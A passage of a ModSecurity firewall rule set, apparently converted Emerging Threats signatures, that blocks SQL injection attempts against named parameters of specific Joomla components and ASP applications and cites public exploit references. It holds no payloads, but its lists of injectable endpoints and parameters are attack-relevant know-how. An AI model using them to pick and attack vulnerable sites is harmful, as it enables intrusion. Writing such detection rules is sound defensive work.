Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010809) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010809,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38022'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_yelp&" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:cid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_yelp Component cid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010842) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_avosbillets Component id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010842,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_avosbillets Component id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37576'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_avosbillets&" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_avosbillets Component id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010857) 
SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010857,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_job&" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id_job/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010928) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010928,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11103'" SecRule REQUEST_LINE "@contains /index.php?option=com_perchagallery&" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010951) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010951,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_hdflvplayer&" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010994) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /administrator/components/com_sqlreport/ajax/print.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010994,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:user_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010985) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010985,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter UPDATE 
SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37161'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_quicknews&" "chain" SecRule REQUEST_LINE "@contains &task=view_item" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:newsid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011005) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011005,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38009'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_rsgallery2&" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:catid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011026) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011026,rev:11,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38668'" SecRule 
REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_blog&" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_blog Component id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011081) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011081,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_gbufacebook&" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:face_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla FaceBook Component face_id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006765) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS KLF-DESIGN (aka Kim L. Fraser) KLF-REALTY SQL Injection Attempt -- search_listing.asp category UPDATE SecRule REQUEST_LINE "@contains /search_listing.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006765,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS KLF-DESIGN (aka Kim L. 
Fraser) KLF-REALTY SQL Injection Attempt -- search_listing.asp category UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21199'" SecRule &TX:'/SQL_INJECTION.*ARGS:category/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS KLF-DESIGN (aka Kim L. Fraser) KLF-REALTY SQL Injection Attempt -- search_listing.asp category UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006771) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS KLF-DESIGN (aka Kim L. Fraser) KLF-REALTY SQL Injection Attempt -- search_listing.asp agent UPDATE SecRule REQUEST_LINE "@contains /search_listing.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006771,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS KLF-DESIGN (aka Kim L. Fraser) KLF-REALTY SQL Injection Attempt -- search_listing.asp agent UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21199'" SecRule &TX:'/SQL_INJECTION.*ARGS:agent/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS KLF-DESIGN (aka Kim L. Fraser) KLF-REALTY SQL Injection Attempt -- search_listing.asp agent UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006777) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS KLF-DESIGN (aka Kim L. Fraser) KLF-REALTY SQL Injection Attempt -- detail.asp property_id UPDATE SecRule REQUEST_LINE "@contains /detail.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006777,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS KLF-DESIGN (aka Kim L. 
Fraser) KLF-REALTY SQL Injection Attempt -- detail.asp property_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21199'" SecRule &TX:'/SQL_INJECTION.*ARGS:property_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS KLF-DESIGN (aka Kim L. Fraser) KLF-REALTY SQL Injection Attempt -- detail.asp property_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004646) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id UPDATE SecRule REQUEST_LINE "@contains /news.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004646,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/4040/'" SecRule &TX:'/SQL_INJECTION.*ARGS:news_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004127) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Katalog Plyt Audio SQL Injection Attempt -- index.php kolumna UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004127,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Katalog Plyt Audio SQL Injection Attempt -- index.php kolumna UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/3513/'" SecRule &TX:'/SQL_INJECTION.*ARGS:kolumna/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Katalog Plyt Audio SQL Injection Attempt -- index.php kolumna 
UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004984) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Kisisel Site 2007 SQL Injection Attempt -- forum.asp forumid UPDATE SecRule REQUEST_LINE "@contains /forum.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004984,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Kisisel Site 2007 SQL Injection Attempt -- forum.asp forumid UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/3278/'" SecRule &TX:'/SQL_INJECTION.*ARGS:forumid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Kisisel Site 2007 SQL Injection Attempt -- forum.asp forumid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005801) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Kolayindir Download (Yenionline) SQL Injection Attempt -- down.asp id UPDATE SecRule REQUEST_LINE "@contains /down.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005801,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Kolayindir Download (Yenionline) SQL Injection Attempt -- down.asp id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21889'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Kolayindir Download (Yenionline) SQL Injection Attempt -- down.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004694) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Kubix SQL Injection Attempt -- index.php member_id UPDATE SecRule REQUEST_LINE "@contains /index.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004694,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Kubix SQL Injection Attempt -- index.php member_id UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/2863/'" SecRule &TX:'/SQL_INJECTION.*ARGS:member_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Kubix SQL Injection Attempt -- index.php member_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005074) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Michelles L2J Dropcalc SQL Injection Attempt -- i-search.php itemid UPDATE SecRule REQUEST_LINE "@contains /i-search.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005074,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Michelles L2J Dropcalc SQL Injection Attempt -- i-search.php itemid UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/3232/'" SecRule &TX:'/SQL_INJECTION.*ARGS:itemid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Michelles L2J Dropcalc SQL Injection Attempt -- i-search.php itemid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005978) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Neocrome Land Down Under (LDU) SQL Injection Attempt -- journal.php w UPDATE SecRule REQUEST_LINE "@contains /journal.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005978,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Neocrome Land Down Under (LDU) SQL Injection Attempt -- journal.php w UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/455495/100/0/threaded'" SecRule 
&TX:'/SQL_INJECTION.*ARGS:w/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Neocrome Land Down Under (LDU) SQL Injection Attempt -- journal.php w UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006320) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Neocrome Land Down Under (LDU) SQL Injection Attempt -- polls.php id UPDATE SecRule REQUEST_LINE "@contains /polls.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006320,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Neocrome Land Down Under (LDU) SQL Injection Attempt -- polls.php id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21366'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Neocrome Land Down Under (LDU) SQL Injection Attempt -- polls.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004528) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LI-Guestbook SQL Injection Attempt -- guestbook.php country UPDATE SecRule REQUEST_LINE "@contains /guestbook.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004528,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS LI-Guestbook SQL Injection Attempt -- guestbook.php country UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22821'" SecRule &TX:'/SQL_INJECTION.*ARGS:country/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LI-Guestbook SQL Injection Attempt -- guestbook.php country UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007299) SpiderLabs Research (SLR) Public 
Vulns: ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- status.asp id UPDATE SecRule REQUEST_LINE "@contains /inout/status.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007299,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- status.asp id UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/4704'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- status.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007305) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- update.asp id UPDATE SecRule REQUEST_LINE "@contains /inout/update.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007305,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- update.asp id UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/4704'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- update.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007311) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- forgotpass.asp id UPDATE SecRule REQUEST_LINE "@contains /forgotpass.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007311,rev:5,msg:'SLR: ET 
WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- forgotpass.asp id UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/4704'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- forgotpass.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007317) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- forgotpass.asp uid UPDATE SecRule REQUEST_LINE "@contains /forgotpass.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007317,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- forgotpass.asp uid UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/4704'" SecRule &TX:'/SQL_INJECTION.*ARGS:uid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- forgotpass.asp uid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007323) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- update.asp uid UPDATE SecRule REQUEST_LINE "@contains /inout/update.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007323,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- update.asp uid UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/4704'" SecRule &TX:'/SQL_INJECTION.*ARGS:uid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 
Doug Luxem Liberum Help Desk SQL Injection Attempt -- update.asp uid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007329) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- status.asp uid UPDATE SecRule REQUEST_LINE "@contains /inout/status.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007329,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- status.asp uid UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/4704'" SecRule &TX:'/SQL_INJECTION.*ARGS:uid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- status.asp uid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007335) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- details.asp id UPDATE SecRule REQUEST_LINE "@contains /details.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007335,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- details.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2846'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Doug Luxem Liberum Help Desk SQL Injection Attempt -- details.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006662) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LINK Content Management Server 
(CMS) SQL Injection Attempt -- navigacija.php IDMeniGlavni UPDATE
# NOTE(review): every rule in this run is a chain. The first SecRule tests the
# request line for a script path; the last one counts (&TX ... "@gt 0") TX
# variables whose names match /SQL_INJECTION.*ARGS:<param>/ and, on a hit, adds
